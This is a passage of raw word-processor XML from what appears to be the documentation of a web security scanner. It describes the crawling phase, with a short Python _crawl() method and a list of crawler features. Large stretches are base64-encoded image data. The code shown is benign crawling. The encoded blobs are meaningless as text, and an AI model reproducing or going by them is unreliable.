U975EsX85JbiM1xw4CBAgcKqAQFO/OcbTdZdyjEfNj/VcM8k1zv3n8YTW5y5lgdZxpgLjcQAfmuSPz/3rj5K88kxnVD/4WJuDAIEZBASaeuQHJrlPfVkVCRBoJvDpSZ7abM6mS6C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E2jqTVUk0FFAoOnYNXNuKyDQ1LdOoKk3VZFARwGBpmPXzLmtgEBT3zqBpt5URQIdBQSajl0z57YCAk196wSaelMVCXQUEGg6ds2c2woINPWtG4HmS+vLqkiAQDOBOyR5arM5my6BtgICTdvWmTgBAgQIECDwRgGBxl4gQIAAAQIE2gsINO1baAEECBAgQICAQNestNYAAA8aSURBVGMPECBAgAABAu0FBJr2LbQAAgQIECBAQKCxBwgQIECAAIH2AgJN+xZaAAECBAgQICDQ2AMECBAgQIBAewGBpn0LLYAAAQIECBAQaOwBAgQIECBAoL2AQNO+hRZAgAABAgQICDT2AAECBAgQINBeQKBp30ILIECAAAECBAQae4AAAQIECBBoLyDQtG+hBRAgQIAAAQICjT1AgAABAgQItBcQaNq30AIIECBAgAABgcYeIECAAAECBNoLCDTtW2gBBAgQIECAgEBjDxAgQIAAAQLtBQSa9i20AAIECBAgQECgsQcIECBAgACB9gICTfsWWgABAgQIECAg0NgDBAgQIECAQHsBgaZ9Cy2AAAECBAgQEGjsAQIECBAgQKC9gEDTvoUWQIAAAQIECAg09gABAgQIECDQXkCgad9CCyBAgAABAgQEGnuAAAECBAgQaC8g0LRvoQUQIECAAAECAo09QIAAAQIECLQXEGjat9ACCBAgQIAAAYHGHiBAgAABAgTaCwg07VtoAQQIECBAgIBAYw8QIECAAAEC7QUEmvYttAACBAgQIEBAoLEHCBAgQIAAgfYCAk37FloAAQIECBAgINDYAwQIECBAgEB7AYGmfQstgAABAgQIEBBo7AECBAgQIECgvYBA076FFkCAAAECBAgINPYAAQIECBAg0F5AoGnfQgsgQIAAAQIEBBp7gAABAgQIEGgvINC0b6EFECBAgAABAgKNPUCAAAECBAi0FxBo2rfQAggQIECAAAGBxh4gQIAAAQIE2gsINO1baAEECBAgQICAQGMPECBAgAABAu0FBJr2LbQAAgQIECBAQKCxBwgQIECAAIH2AgJN+xZaAAECBAgQICDQ2AMECBAgQIBAewGBpn0LLYAAAQIECBAQaOwBAgQIECBAoL2AQNO+hRZAgAABAgQICDT2AAECBAgQINBeQKBp30ILIECAAAECBAQae4AAAQIECBBoLyDQtG+hBRAgQIAA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98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phase-1-target-discovery-crawling"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Target Discovery &amp; Crawling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_crawl()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Concurrency</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ThreadPoolExecutor (BFS with async workers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">def _crawl(self, url):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    if url in self.visited_urls: return</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    self.visited_urls.add(url)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    response = self.session.get(url)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    soup = BeautifulSoup(response.text, 'html.parser')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ... link extraction and processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key Features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Breadth-First Search (BFS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with depth limiting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Same-domain restriction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">self.base_domain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HTML Element Support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&lt;a href&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;form action&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script src&gt;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&lt;link href&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src&gt;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Auto-normalization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of relative URLs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Process Flow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="343017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BRQAAANECAYAAADBuKMlAAAAAXNSR0IArs4c6QAAIABJREFUeF7snQncbVP9/783ociQjJUoREqa+FUoUZIGTRqlElePUvIvksrVZIiifjzd60alkTQIGdIoZSiEpFSGRqWIVG66//PZv7Vv+557zvPsc/Zwvmuv93q9vC732cN3vT/L+Tz7c9Zea47RIAABCEAAAhCAAAQgAAEIQAACEIAABCAAAQiUJDCn5HEcBgEIQAACEIAABCAAAQhAAAIQgAAEIAABCEDACBQZBBCAAAQgAAEIQAACEIAABCAAAQhAAAIQgEBpAgSKpVFxIAQgAAEIQAACEIAABCAAAQhAAAIQgAAEIECgyBiAAAQgAAEIQAACEIAABCAAAQhAAAIQgAAEShMgUCyNigMhAAEIQAACEIAABCAAAQhAAAIQgAAEIAABAkXGAAQgAAEIQAACEIAABCAAAQhAAAIQgAAEIFCaAIFiaVQcCAEIQAACEIAABCAAAQhAAAIQgAAEIAABCBAoMgYgAAEIQAACEIAABCAAAQhAAAIQgAAEIACB0gQIFEuj4kAIQAACEIAABCAAAQhAAAIQgAAEIAABCECAQJExAAEIQAACEIAABCAAAQhAAAIQgAAEIAABCJQmQKBYGhUHQgACEIAABCAAAQhAAAIQgAAEIAABCEAAAgSKjAEIQAACEIAABCAAAQhAAAIQgAAEIAABCECgNAECxdKoOBACEIAABCAAAQhAAAIQgAAEIAABCEAAAhAgUGQMQAACEIAABCAAAQhAAAIQgAAEIAABCEAAAqUJECiWRsWBEIAABCAAAQhAAAIQgAAEIAABCEAAAhCAAIEiYwACEIAABCAAAQhAAAIQgAAEIAABCEAAAhAoTYBAsTQqDoQABCAAAQhAAAIQgAAEIAABCEAAAhCAAAQIFBkDEIAABCAAAQhAAAIQgAAEIAABCEAAAhCAQGkCBIqlUbV74Ny5cx9iZm+YM2fOLosXL97UzJZvtwLuBgEIQGAJgUVz5sy5bvHixWeb2fELFiy4CTZ+CeAffrWhMggkSAD/iEh0/CMisSgVAt0ngH9EoDGBokOR5s6du5eZnUCI6FAcSoIABBaZ2b4LFixYCAp/BPAPf5pQEQQg8N8vp/APv6MB//CrDZVBAALG84fTQUCg6EyYYOYnqqwtt9zSttpqK1t//fVtueWWc1Yp5UAAAqkQuOeee+zmm2+2Sy+91K688sq823sTKvoaAfiHLz2oBgIQMMM/4hgF+EccOlElBFIigH/EoTaBoiOdwmsG12tm4s4772zbbruto+ooBQIQgIDZhRdeaOecc45Q6JvCjXn92ceowD986EAVEIDAcAL4h8/RgX/41IWqIACB/xLAP/yOBgJFR9rMnTv3SDM7UDMTd9ttN0eVUQoEIACB/xI47bTT8pmKRy1YsOAg2EyeAP4xeQ2oAAIQmJ0A/jE7o7aPwD/aJs79IACBcQjgH+NQa/4cAsXmGZe+wz777HPV4sWLH7XXXnvZhhtuWPo8DoQABCDQJoEbbrjBFi5caHPmzLl6/vz5W7R5b+41mAD+wciAAARiIIB/+FMJ//CnCRVBAALLEsA/fI4KAkVHusydO/duve582GGHsWaiI10oBQIQWJqA1jQ59NBD9ZeLFixYsAJ8Jk8A/5i8BlQAAQjMTgD/mJ1R20fgH20T534QgMA4BPCPcag1fw6BYvOMS99h7ty5i3Xw+973vtLncCAEIACBSRB45zvfmd12wYIF+MgkBOi7J/7hQARKgAAEShHAP0phau0g/KM11NwIAhCoSAD/qAiwgdN5EGwA6riXxNDHJcd5EIBA2wQw9LaJz3w//MOXHlQDAQgMJ4B/+Bod+IcvPagGAhDAP2IaAwSKjtTC0B2JQSkQgMCMBHgg9DVA8A9felANBCDAA2EsYwD/iEUp6oQABHj+8DcGCBQdaYKhOxKDUiAAAQLFiMYA/hGRWJQKgcQJ8EDoawDgH770oBoIQIAvpGIaAwSKjtTC0B2JQSkQgACBYkRjAP+ISCxKhUDiBAgUfQ0A/MOXHlQDAQgQKMY0BggUHamFoTsSg1IgAAECxYjGAP4RkViUCoHECRAo+hoA+IcvPagGAhAgUIxpDBAoOlILQ3ckBqVAAAIEihGNAfwjIrEoFQKJEyBQ9DUA8A9felANBCBAoBjTGCBQdKQWhu5IDEqBAAQIFCMaA/hHRGJRKgQSJ0Cg6GsA4B++9KAaCECAQDGmMUCg6EgtDN2RGJQCAQgQKEY0BvCPiMSiVAgkToBA0dcAwD986UE1EIAAgWJMY4BA0ZFaGLojMSgFAhAgUIxoDOAfEYlFqRBInACBoq8BgH/40oNqIAABAsWYxgCBoiO1MHRHYlAKBCBAoBjRGMA/IhKLUiGQOAECRV8DAP/wpQfVQAACBIoxjQECRUdqYeiOxKAUCECAQDGiMYB/RCQWpUIgcQIEir4GAP7hSw+qgQAECBRjGgMEio7UwtAdiUEpEIAAgWJEYwD/iEgsSoVA4gQIFH0NAPzDlx5UAwEIECjGNAYIFB2phaE7EoNSIAABAsWIxgD+EZFYlAqBxAkQKPoaAPiHLz2oBgIQIFCMaQwQKDpSC0N3JAalQAACBIoRjQH8IyKxKBUCiRMgUPQ1APAPX3pQDQQgQKAY0xggUHSkFobuSAxKgQAECBQjGgP4R0RiUSoEEidAoOhrAOAfvvSgGghAgEAxpjFAoOhILQzdkRiUAgEIEChGNAbwj4jEolQIJE6AQNHXAMA/fOlBNRCAAIFiTGOAQNGRWhi6IzEoBQIQIFCMaAzgHxGJRakQSJwAgaKvAYB/+NKDaiAAAQLFmMYAgaIjtTB0R2JQCgQgQKAY0RjAPyISi1IhkDgBAkVfAwD/8KUH1UAAAgSKMY0BAkVHamHojsSgFAhAgEAxojGAf0QkFqVCIHECBIq+BgD+4UsPqoEABAgUYxoDBIqO1MLQHYlBKRCAAIFiRGMA/4hILEqFQOIECBR9DQD8w5ceVAMBCBAoxjQGCBQdqYWhOxKDUiAAAQLFiMYA/hGRWJQKgcQJECj6GgD4hy89qAYCECBQjGkMECg6UgtDdyQGpUAAAgSKEY0B/CMisSgVAokTIFD0NQDwD196UA0EIECgGNMYIFB0pBaG7kgMSoEABAgUIxoD+EdEYlEqBBInQKDoawDgH770oBoIQIBAMaYxQKDoSC0M3ZEYlAIBCBAoRjQG8I+IxKJUCCROgEDR1wDAP3zpQTUQgACBYkxjgEDRkVoYuiMxKAUCECBQjGgM4B8RiUWpEEicAIGirwGAf/jSg2ogAAECxZjGAIGiI7UwdEdiUAoEIECgGNEYwD8iEotSIZA4AQJFXwMA//ClB9VAAAIEijGNAQJFR2ph6I7EoBQIQIBAMaIxgH9EJBalQiBxAgSKvgYA/uFLD6qBAAQIFGMaAwSKjtTC0B2JQSkQgACBYkRjAP+ISCxKhUDiBAgUfQ0A/MOXHlQDAQgQKMY0BggUHamFoTsSg1IgAAECxYjGAP4RkViUCoHECRAo+hoA+IcvPagGAhAgUIxpDBAoOlILQ3ckBqVAAAIEihGNAfwjIrEoFQKJEyBQ9DUA8A9felANBCBAoBjTGCBQdKQWhu5IDEqBAAQIFCMaA/hHRGJRKgQSJ0Cg6GsA4B++9KAaCECAQDGmMUCg6EgtDN2RGJQCAQgQKEY0BvCPiMSiVAgkToBA0dcAwD986UE1EIAAgWJMY4BA0ZFaGLojMSgFAhAgUIxoDOAfEYlFqRBInACBoq8BgH/40oNqIAABAsWYxgCBoiO1MHRHYlAKBCBAoBjRGMA/IhKLUiGQOAECRV8DAP/wpQfVQAACBIoxjQECRUdqYeiOxKAUCECAQDGiMYB/RCQWpUIgcQIEir4GAP7hSw+qgQAECBRjGgMEio7UwtAdiUEpEIAAgWJEYwD/iEgsSoVA4gQIFH0NAPzDlx4pVXPjjTfaqaeeulSX11lnHdtjjz1SwkBfRyCAf4wAq6VDCRRbAl3mNhh6GUocM0kCJ5xwgp188sn2m9/8xu65556slLe//e12wAEHTLIs7j0BAhj6BKDPcEv8w5ceVAMBCAwngH/4Gh34x2T1OOKII+yzn/2s/eEPf1hSyNVXX21rr732ZAtr4e633XabnX/++XbdddfZKaecYn/9619tyy23zP6uS43np/rUxD/qY1nXlQgU6yJZw3Uw9BogtnCJm266yc466yy7+OKLMwOU+f3tb3+z+9znPrbqqqvaKqusYuutt55tuumm9vCHP9y22mor22yzzVqorL1bKFB83OMeR6DYHnJ3d8LQfUmCf/jSY5Rqbr/9dttmm23slltuGXqa/GX11VfPfGXbbbe1l770pbbuuuuOchuOhYAbAviHGymyQvCP0fT42c9+Zk95ylNGO2nI0V/84heXXOvII4+0Y445JjsylUCxiOUZz3iGXXnllUsFil3zR56fqv9vg39UZ1j3FQgU6yZa4XoYegV4LZz6+9//3g499FD72te+ls3OU6C2ww472EYbbWQPeMADbNGiRdkDoX4J+Na3vmW/+tWvsqqe9axn2Sc/+ckWKmzvFr/73e/sMY95DIFie8jd3QlD9yUJ/uFLj3GqufPOO216eto++MEPZqfry6iXv/zl9u9//9v+8pe/ZA9aF1xwgd1999123/ve1+bNm2evfe1rx7kV50BgogTwj4niX+bm+MdoeuSBogIwPQusscYa2Wfyve99b1tuueWy54Qzzzwzu+guu+xiu+6661I30DPEL37xC/vwhz9sxUBRn/355z+B4tIzFLvijzw/jfb/2qCj8Y/qDOu+AoFi3UQrXA9DrwCv4VM1G1EPbn/+85/twQ9+sB133HG23XbbzXhXnfPGN74xm6X4mc98puEK2708htgub493w9B9qYJ/+NJj3Go+/elPL1lCQrMQP/rRjy51qZtvvtle8YpXZLPj1fRzHUeDQEwE8A9fauEfo+mRB4qaPPDIRz5ymZOLweBb3vIWO/jgg5c55k9/+lN2LoHif9EMmqFYBNcFf+T5abT/1wgUq/Nq4woEim1QLnkPDL0kqJYPu+GGG0wmp2n3esXs7LPPzkLFMk3rC/7yl7+00047rczh0RyDIUYjVWOF8kDYGNqxLox/jIXN3UmzPTCp4Guuucae9rSnZbVrdvwVV1xhK664oru+UBAEhhHAP3yNDfxjND3yQFG/32uZo/5WJlBcvHixPeQhD8kmHOSvTzNDcdlXnkcJFGPwR56fRvt/jUCxOq82rkCg2AblkvfA0EuCavmw5zznOXbJJZdkd124cKE973nPK12BXnX+yle+Yl/+8pdLnxPDgRhiDCo1WyMPhM3yHfXq+MeoxHweXyZQVOVPfepT7dprr806oR0yt99+e58doioIDCCAf/gaFvjHaHrodeVXvvKVS54NxgkUdc7OO++cLaX0pCc9KbtE6oHiM5/5TLv88suHbsrSBX/k+Wm0/9cIFKvzauMKBIptUC55Dwy9JKgWD/vBD36wZO0TzUr80Y9+ZHPmlP/fRhu2aBMX7VjWpYYhdknN8frCA+F43Jo6C/9oimy71y37wDR37tzsyyq19773vbbPPvu0Wyh3g0AFAvhHBXgNnIp/1Au1zAzFQXcsnvfTn/7U1lxzzXoLc361fALHsF2eu+CPPD9VH4T4R3WGdV+hfDJS95253jIEMHR/g+KAAw4wGZja1NSUHXbYYZWKPPzww+0jH/lItqmLml6l1usO//znP+3000/PZjLq9TWty7L++utnx+jvzz33XNMrFlpzRTtKL7/88rbhhhuazFfrNGoHUDV9a6pF/BViFptei3vuc59rRx11VKn699xzT7vooouyjQDU9EqH1u3Sg6taWUP8+9//bieeeGL2mrg2qVE/11prLfuf//mf7AH4sY997JJ6zj//fNtrr73sH//4R/Z3K620kul1c70W8s1vfjN7bfzC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